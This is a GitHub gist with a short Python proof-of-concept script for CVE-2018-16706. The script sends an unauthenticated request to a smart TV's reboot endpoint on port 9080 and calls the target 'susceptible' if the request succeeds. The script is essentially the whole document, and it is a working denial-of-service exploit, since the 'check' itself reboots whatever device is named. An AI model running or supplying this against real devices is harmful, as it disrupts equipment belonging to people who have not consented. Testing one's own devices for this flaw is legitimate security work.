Last active
March 31, 2024 19:27
-
-
Save ninp0/80fb90c49411a33a3135cab26c379fcc to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# CVE-2018-16706 | |
import argparse | |
import requests | |
import sys | |
parser = argparse.ArgumentParser() | |
parser.add_argument( | |
'-t', | |
'--target', | |
type=str, | |
required=True, | |
help='required - String, Smart TV IP address or Hostname to Target' | |
) | |
parser.add_argument( | |
'-T', | |
'--timeout', | |
default=9, | |
type=float, | |
required=False, | |
help='optional - Float, HTTP request timeout in seconds (default: 9.0)' | |
) | |
# If no arguments are provided, print the help message | |
if len(sys.argv) == 1: | |
parser.print_help(sys.stderr) | |
sys.exit(1) | |
try: | |
args = parser.parse_args() | |
target = args.target | |
target_uri = 'http://{target}:9080/qsr_server/device/reboot'.format(target = target) | |
timeout = args.timeout | |
resp = requests.get( | |
target_uri, | |
timeout=timeout | |
) | |
if resp.status_code == 200: | |
print("{target} is susceptible to CVE-2018-16706!!!".format(target = target)) | |
print("HTTP Response Code:", resp.status_code) | |
print("HTTP Response Headers:", resp.headers) | |
print("HTTP Response Body:", resp.content) | |
except KeyboardInterrupt: | |
print("\nCTRL+C detected...goodbye.") | |
sys.exit(1) | |
except requests.exceptions.Timeout: | |
print("Timeout Error: Request to {target} timed out after {timeout} seconds".format(target = target, timeout = timeout)) | |
except requests.exceptions.ConnectionError: | |
print("Connection Error: Unable to connect to {target}".format(target = target)) | |
except requests.exceptions.RequestException as e: | |
print("Request Error: {error}".format(error = e)) | |
except Exception as e: | |
print("{target} is not susceptible to CVE-2018-16706".format(target = target)) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment